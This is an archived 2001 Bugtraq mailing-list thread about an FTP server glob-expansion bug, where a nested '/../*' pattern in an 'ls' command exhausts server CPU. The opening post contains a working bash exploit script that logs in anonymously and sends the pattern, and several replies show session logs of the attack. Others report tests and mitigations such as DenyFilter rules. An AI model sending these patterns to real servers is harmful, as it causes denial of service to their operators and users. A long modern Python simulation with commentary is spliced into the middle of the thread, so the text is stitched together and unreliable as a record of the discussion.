6941350 2001-08-20 15:20 +0200  /55 lines/ Enrico Kern <IphantomI@web.de>
Sent by: joel@lysator.liu.se
Imported: 2001-08-20  19:52  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18853>
Subject: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Enrico Kern" <IphantomI@web.de>
To: bugtraq@securityfocus.com
Message-ID: <200108201320.f7KDKZK26818@mailgate4.cinetic.de>

Hi,

I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
many new Linux distributions. When a user logs in via ftp and types
the ls command, in.ftpd takes over 90 percent CPU usage; execute
the command 2 or 3 times and the full system hangs up. It also works in
the console. I wonder why this is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ
in March 01, but
it still works, so I post it again.

affected:

RedHat Linux 7.x
Linux Mandrake 8.0
SuSE Linux 7.2
FreeBSD 4.3
AiX V 4.3
other?


Not vuln.:

latest Wu-Ftpd
Windows FTP-Server


Exploit:

#!/bin/bash
# Log in anonymously to FTP-SERVER (replace with the target host) and
# send the glob pattern; the server's expansion of the argument is
# what burns the CPU.
ftp -n FTP-SERVER <<\end
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye
end

Fix:

Set a CPU limit for your anonymous user.


-------------------------
Enrico Kern
www.h07.org
(6941350) /Enrico Kern <IphantomI@web.de>/----------
Comment in text 6942692 by skip <skip@fif3.com>
Comment in text 6943064 by Scott Dier <dieman@ringworld.org>
Comment in text 6943159 by Mike Jakubik <mikej@trigger.net>
Comment in text 6943274 by Bernhard Rosenkraenzer <bero@redhat.de>
Comment in text 6943282 by Roman Drahtmueller <draht@suse.de>
6942692 2001-08-20 13:35 -0700  /18 lines/ skip <skip@fif3.com>
Sent by: joel@lysator.liu.se
Imported: 2001-08-20  23:22  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18859>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
I just tested on Slackware 8 running ProFTPD Version 1.2.1
and no bug... or at least I received the directory listings and no
great CPU load was seen nor did my system hang. Tested via
localhost and a remote host.
----
- skip
----
- p.s. we sincerely apologize to all platypus enthusiasts out
- there who are offended by that thoughtless comment about
- the platypi. we love the noble platypus, and it is not our
- intention to slight these stupid creatures in any way.
----
(6942692) /skip <skip@fif3.com>/--------------------
Attachment (application/x-pkcs7-signature) in text 6942693
Comment in text 6943150 by jeev <geonap@pacbell.net>
6942693 2001-08-20 13:35 -0700  /13 lines/ skip <skip@fif3.com>
Attachment filename: "smime.p7s"
Imported: 2001-08-20  23:22  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18860>
Attachment (text/plain) to text 6942692
Subject: Attachment (smime.p7s) to: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
(6942693) /skip <skip@fif3.com>/----------(Rewrapped)
6943150 2001-08-20 14:29 -0700  /39 lines/ jeev <geonap@pacbell.net>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  01:41  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18867>
Comment to text 6942692 by skip <skip@fif3.com>
Subject: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: jeev <geonap@pacbell.net>
To: bugtraq@securityfocus.com
Message-ID: <000501c129bf$32cf18d0$0100a8c0@jeev>

Tested on slack 8 with 1.2.2rc3 no problem, and with 1.2.2 no problem:

ftp> ls /../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of /../*/../*/../*/../*/../*/../*/../*
226 Transfer complete.
ftp>

j

-----Original Message-----
From: skip [mailto:skip@fif3.com] 
Sent: Monday, August 20, 2001 1:36 PM
To: bugtraq@securityfocus.com
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)

I just tested on Slackware 8 running ProFTPD Version 1.2.1
and no bug... or at least I received the directory listings and no
great CPU load was seen nor did my system hang. Tested via
localhost and a remote host.
----
- skip
----
- p.s. we sincerely apologize to all platypus enthusiasts out
- there who are offended by that thoughtless comment about
- the platypi. we love the noble platypus, and it is not our
- intention to slight these stupid creatures in any way.
----
(6943150) /jeev <geonap@pacbell.net>/---------------
6943064 2001-08-20 15:35 -0500  /21 lines/ Scott Dier <dieman@ringworld.org>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  01:10  by Brevbäraren
External recipient: Enrico Kern <IphantomI@web.de>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18866>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Scott Dier <dieman@ringworld.org>
To: Enrico Kern <IphantomI@web.de>
Cc: bugtraq@securityfocus.com
Message-ID: <20010820153506.M9092@ringworld.org>

* Enrico Kern <IphantomI@web.de> [010820 12:31]:
> Hi,
> 
> I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on

http://www.proftpd.org/critbugs.html

Add "DenyFilter \*.*/" to your config.

No software patch beats actual systems administration.

-- 
Scott Dier <dieman@ringworld.org> <sdier@debian.org>
http://www.ringworld.org/  #linuxos@irc.openprojects.net
(6943064) /Scott Dier <dieman@ringworld.org>/-------
6943159 2001-08-20 15:14 -0400  /28 lines/ Mike Jakubik <mikej@trigger.net>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  01:47  by Brevbäraren
External recipient: Enrico Kern <IphantomI@web.de>
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18868>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Mike Jakubik" <mikej@trigger.net>
To: "Enrico Kern" <IphantomI@web.de>, <bugtraq@securityfocus.com>
Message-ID: <FMELKCEINAGGPLLNMKEOGEACCNAA.mikej@trigger.net>

> Hi,
>
> I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> many new Linux distributions. When a user logs in via ftp and types
> the ls command, in.ftpd takes over 90 percent CPU usage; execute
> the command 2 or 3 times and the full system hangs up. It also works in
> the console. I wonder why this is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ
> in March 01, but
> it still works, so I post it again.
>
> affected:
>
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2
> FreeBSD 4.3
> AiX V 4.3
> other?

FreeBSD 4.3 is NOT affected by this; your system code may be out of
sync.  Yes, this is an old globbing bug; almost all ftp daemons have
been updated by now. Distributions from before the bug's announcement
date will of course be affected.
(6943159) /Mike Jakubik <mikej@trigger.net>/(Rewrapped)
6943274 2001-08-20 19:36 +0200  /21 lines/ Bernhard Rosenkraenzer <bero@redhat.de>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  02:44  by Brevbäraren
External recipient: Enrico Kern <IphantomI@web.de>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18871>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Bernhard Rosenkraenzer <bero@redhat.de>
To: Enrico Kern <IphantomI@web.de>
Cc: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108201935480.32746-100000@bochum.stuttgart.redhat.com>

On Mon, 20 Aug 2001, Enrico Kern wrote:

> I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> many new Linux distributions.
>
> affected:
>
> RedHat Linux 7.x

We don't ship proftpd (and never did).

LLaP
bero
(6943274) /Bernhard Rosenkraenzer <bero@redhat.de>/-
6943282 2001-08-21 01:40 +0200  /55 lines/ Roman Drahtmueller <draht@suse.de>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  02:50  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: security@suse.de
Recipient: Bugtraq (import) <18872>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Cc: <security@suse.de>
Message-ID: <Pine.LNX.4.33.0108210132220.9532-100000@dent.suse.de>

>
> I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> many new Linux distributions. When a user logs in via ftp and types
> the ls command, in.ftpd takes over 90 percent CPU usage; execute
> the command 2 or 3 times and the full system hangs up. It also works in
> the console. I wonder why this is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ
> in March 01, but
> it still works, so I post it again.
>
> affected:
>
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2

I wonder when or where you tested this. The proftpd package that can be
found in the /pub/suse/<arch>/update/*/n1/ directories on ftp.suse.com
(age: May 9th) does not show this behaviour and appears to be sane.

[...]

> Fix:
>
> set cpu-limit for your anonymous user.

I doubt that this solution is very efficient if you provide automatic
gzip (and maybe tar) service so that your users can get a directory
recursively in form of a tarfile by using the command

 get directory_name.tar.gz

You'd have to choose...

Also recommended:

DenyFilter  "%"

If there are more format string errors in the code, this might be an
easy workaround until the code is fixed in the right place.

Roman.
-- 
 -                                                                      -
| Roman Drahtmüller      <draht@suse.de> //          "Caution: Cape does |
  SuSE GmbH - Security           Phone: //       not enable user to fly."
| Nürnberg, Germany     +49-911-740530 // (Batman Costume warning label) |
 -                                                                      -
(6943282) /Roman Drahtmueller <draht@suse.de>/(Rewrapped)
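The mechanism behind Enrico's pattern and the two DenyFilter workarounds (Scott Dier's "\*.*/" and Roman's "%"), modelled as an added example. This is my code, not ProFTPD's and not from any poster: it walks a small constructed directory tree (an assumption standing in for the server's filesystem) the way a naive component-by-component glob does, with no de-duplication of intermediate paths, so every "*/.." pair multiplies the work by the number of entries in the root. It applies the DenyFilter regexes before expansion, the way ProFTPD refuses a matching argument with "Forbidden command argument", and adds a budget (a value I chose, not a ProFTPD setting) so that a pattern which escapes the filter still cannot run away.

```python
import fnmatch
import re

# Constructed in-memory directory tree standing in for the server's
# filesystem (an assumption for this example, not any real host).
# Keys are directories, values are the names inside them.
TREE = {
    "/": ["bin", "etc", "home", "pub"],
    "/bin": ["ls", "sh"],
    "/etc": ["passwd", "proftpd.conf"],
    "/home": ["alice", "bob"],
    "/pub": ["README"],
}

# The two DenyFilter regexes recommended in the thread.  ProFTPD's
# DenyFilter refuses any command argument the regex matches anywhere.
DENY_GLOB_SLASH = re.compile(r"\*.*/")   # a '*' followed later by '/'
DENY_PERCENT = re.compile(r"%")          # any '%' (format-string guard)


class GlobBudgetExceeded(Exception):
    """Raised when naive expansion would examine too many paths."""


def _parent(path):
    if path == "/":
        return "/"                        # ".." above the root stays at root
    return path.rsplit("/", 1)[0] or "/"


def _join(path, name):
    return "/" + name if path == "/" else path + "/" + name


def expand(pattern, budget=None):
    """Expand an absolute glob the way a naive server does: component by
    component, keeping every intermediate path even when it repeats.
    Returns (matches, examined); examined counts directory entries looked
    at.  With a budget, gives up once examined or the pending frontier
    exceeds it (the budget is this example's own safety valve)."""
    frontier = ["/"]
    examined = 0
    for part in [p for p in pattern.split("/") if p]:
        nxt = []
        for cur in frontier:
            if part in (".", ".."):
                if cur in TREE:           # a plain file gives ENOTDIR
                    nxt.append(cur if part == "." else _parent(cur))
            elif any(c in part for c in "*?["):
                for name in TREE.get(cur, []):
                    examined += 1
                    if fnmatch.fnmatchcase(name, part):
                        nxt.append(_join(cur, name))
            else:
                examined += 1
                if part in TREE.get(cur, []):
                    nxt.append(_join(cur, part))
            if budget is not None and max(examined, len(nxt)) > budget:
                raise GlobBudgetExceeded(
                    f"{examined} entries examined, {len(nxt)} paths pending")
        frontier = nxt
    return frontier, examined


def deny_filter_rejects(arg, filters=(DENY_GLOB_SLASH, DENY_PERCENT)):
    """True if any configured DenyFilter regex matches the argument."""
    return any(f.search(arg) for f in filters)


def handle_list(arg, budget=10_000, filters=(DENY_GLOB_SLASH, DENY_PERCENT)):
    """Model of the LIST path: filter first, then bounded globbing.
    Returns ("denied", None), ("ok", matches) or ("limit", reason)."""
    if deny_filter_rejects(arg, filters):
        return "denied", None
    try:
        matches, _ = expand(arg, budget)
        return "ok", matches
    except GlobBudgetExceeded as exc:
        return "limit", str(exc)


if __name__ == "__main__":
    # Twelve "/../*" groups, the same shape as the pattern in the thread.
    bad = "/" + "/".join(["..", "*"] * 12)
    print(expand("/../*/../*/../*"))   # 64 duplicate paths, 84 entries looked at
    print(handle_list(bad))            # refused by DenyFilter
    print(handle_list(bad, filters=()))  # unfiltered: stopped by the budget
```

With four entries in the root, three "*/.." pairs already produce 64 candidate paths (all of them "/" repeated), and each further pair multiplies that by four, which is the CPU and memory curve the top output in this thread shows. Note what "\*.*/" does and does not do: it refuses any argument in which a "*" is followed somewhere by a "/", so legitimate requests such as "ls */README" are refused too, while a pattern with no slash after the star passes untouched. The filter is a blacklist the operator can deploy today; bounding the work inside the server is what actually removes the problem.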
6942124 2001-08-20 19:20 +0000  /19 lines/ Michael Faurot <mfaurot@atww.org>
Sent by: joel@lysator.liu.se
Imported: 2001-08-20  22:03  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18858>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Michael Faurot" <mfaurot@atww.org>
To: bugtraq@securityfocus.com
Message-ID: <9lrnt0$k0p$1@phzzzt.atww.org>

Enrico Kern <IphantomI@web.de> wrote:
: Hi,

: I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
: many new Linux distributions.

This bug appears to still be present with Debian Stable (Potato) which
uses ProFTPd v1.2.0pre10.

-- 
------------------------------------------------------------------------------
 Michael | mfaurot  | Give your child mental blocks for Christmas.
 Faurot  | atww.org |
(6942124) /Michael Faurot <mfaurot@atww.org>/-------
Comment in text 6943051 by Robert van der Meulen <rvdm@debian.org>
6943051 2001-08-21 00:12 +0200  /25 lines/ Robert van der Meulen <rvdm@debian.org>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  01:06  by Brevbäraren
External recipient: Michael Faurot <mfaurot@atww.org>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18864>
Comment to text 6942124 by Michael Faurot <mfaurot@atww.org>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Robert van der Meulen <rvdm@debian.org>
To: Michael Faurot <mfaurot@atww.org>
Cc: bugtraq@securityfocus.com
Message-ID: <20010821001246.A9136@wiretrip.org>

Hi,

Quoting Michael Faurot (mfaurot@atww.org):
> : I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> : many new Linux distributions.
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.
Are you sure? What exact version are you testing with?
I tested this with a couple of Debian stable machines, all running with the
latest security updates (i.e. proftpd 1.2.0pre10-2.0potato1), and couldn't
reproduce it.

Greets,
	Robert
-- 
			      Linux Generation
   encrypted mail preferred. finger rvdm@debian.org for my GnuPG/PGP key.
	<doogie> 'How to Raise Your I.Q. by Eating Gifted Children'
(6943051) /Robert van der Meulen <rvdm@debian.org>/-
6943262 2001-08-21 01:41 +0200  /55 lines/ E. van Elk <evelk@dsv.nl>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  02:38  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18870>
Subject: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "E. van Elk" <evelk@dsv.nl>
To: bugtraq@securityfocus.com
Message-ID: <5.1.0.14.2.20010821012930.02edfd50@pop.eve-software.com>

At 00:43 21-8-2001, you wrote:
 >Couldn't reproduce on Debian 2.2....
 >
 >isp-server-03:/# proftpd -v
 > - ProFTPD Version 1.2.0pre10

I tested it on my Debian 2.2 machine and:

:/# proftpd -v
  - ProFTPD Version 1.2.0pre10

Connected to .
220 ProFTPD 1.2.0pre10 Server (Debian) []
User ( :(none)):
331 Password required for .
Password:
230 User  logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Connection closed by remote host.
ftp>

CPU goes to 99.1 % and after the second attempt the connection to the 
server is broken..

Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:

Connected to .
220  FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
User ( :(none)):
331 Password required for .
Password:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686
unknown
230-
230 User  logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Connection closed by remote host.
ftp>

CPU goes to 99.1 % and after the second attempt the connection to the 
server is broken..
(6943262) /E. van Elk <evelk@dsv.nl>/---------------
6943327 2001-08-21 08:43 +1000  /50 lines/ Michael Bellears <michael.bellears@staff.datafx.com.au>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  03:19  by Brevbäraren
External recipient: 'Michael Faurot' <mfaurot@atww.org>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18875>
Subject: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Michael Bellears <michael.bellears@staff.datafx.com.au>
To: 'Michael Faurot' <mfaurot@atww.org>
Cc: bugtraq@securityfocus.com
Message-ID: <C01D5C25A363D411A99200902760F2712C2A94@thematrix.datafx.com.au>

Couldn't reproduce on Debian 2.2....

isp-server-03:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*:
Forbidden command argument
ftp> quit
221 Goodbye.

Regards,
MB


> -----Original Message-----
> From: Michael Faurot [mailto:mfaurot@atww.org]
> Sent: Tuesday, 21 August 2001 5:20 AM
> To: bugtraq@securityfocus.com
> Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
> 
> 
> Enrico Kern <IphantomI@web.de> wrote:
> : Hi,
> 
> : I tested an old proftpd bug (ls 
> /../*/../*/../*/../*/../*/../*/../*) on
> : many new Linux distributions.
> 
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.
> 
> -- 
> --------------------------------------------------------------
> ----------------
>  Michael | mfaurot  | Give your child mental blocks for Christmas.
>  Faurot  | atww.org | 
>
(6943327) /Michael Bellears <michael.bellears@staff.datafx.com.au>/
6943621 2001-08-21 03:54 +0000  /76 lines/ Michael Faurot <mfaurot@atww.org>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  06:26  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18879>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Michael Faurot" <mfaurot@atww.org>
To: bugtraq@securityfocus.com
Message-ID: <9lsm23$2g9$1@phzzzt.atww.org>

Michael Bellears <michael.bellears@staff.datafx.com.au> wrote:
: Couldn't reproduce on Debian 2.2....

: isp-server-03:/# proftpd -v
:  - ProFTPD Version 1.2.0pre10

Debian 2.2 and the same version of ProftpD here.

According to dpkg:

dpkg -s proftpd | grep ^Version
Version: 1.2.0pre10-2.0potato1


The client side of the ftp session, that initiates the problem:
------------------------------------------------------------------------------

Script started on Mon Aug 20 18:15:49 2001
$ ftp ftp.mydomain.com
Connected to web.mydomain.com.
220 ProFTPD 1.2.0pre10 Server (mydomain.com FTP) [web.mydomain.com]
Name (ftp.mydomain.com:mfaurot):
331 Password required for mfaurot.
Password:
230 User mfaurot logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
Quit
$ exit
Script done on Mon Aug 20 18:18:22 2001
------------------------------------------------------------------------------

After issuing the "ls" command the server seems to freeze after
displaying "150 Opening ASCII mode data connection for file list."  It
then becomes necessary to issue a Ctrl-\ to exit the ftp client.

Now, on the server hosting Proftpd, here's the relevant bit from "top"
showing the proftpd process sucking all the available CPU and a lot of
the RAM:
------------------------------------------------------------------------------

  6:18pm  up 5 days,  3:02,  2 users,  load average: 0.28, 0.06, 0.02
45 processes: 42 sleeping, 3 running, 0 zombie, 0 stopped
CPU states:  0.6% user,  0.1% system,  0.2% nice,  1.9% idle
Mem:  255984K av, 184876K used,  71108K free,      0K shrd,   2464K buff
Swap: 248968K av,  26260K used, 222708K free                 19400K cached
 
  PID USER     PRI  NI  SIZE  RSS SHARE STAT  LIB %CPU %MEM   TIME COMMAND
27556 mfaurot   20   0 76884  75M   952 R       0 96.4 30.0   0:21 proftpd
27561 mfaurot   12   0  1476 1476   740 R       0  2.8  0.5   0:00 top
    1 root       8   0   132   84    60 S       0  0.0  0.0   0:03 init
    2 root       9   0     0    0     0 SW      0  0.0  0.0   0:00 keventd

------------------------------------------------------------------------------

NOTE:  The configuration option "DenyFilter \*.*/" has not been applied
to this system.  While that might well resolve the issue for me, 
that's not going to fix the problem for the next person that is
unaware of the bug.  

In discussing this situation with Robert van der Meulen, I note that
this only happens when one logs in with a regular user id and
password, but it doesn't happen when doing an anonymous login.

-- 
------------------------------------------------------------------------------
 Michael | mfaurot  | We're all just basically monkeys with car keys.
 Faurot  | atww.org |
(6943621) /Michael Faurot <mfaurot@atww.org>/-------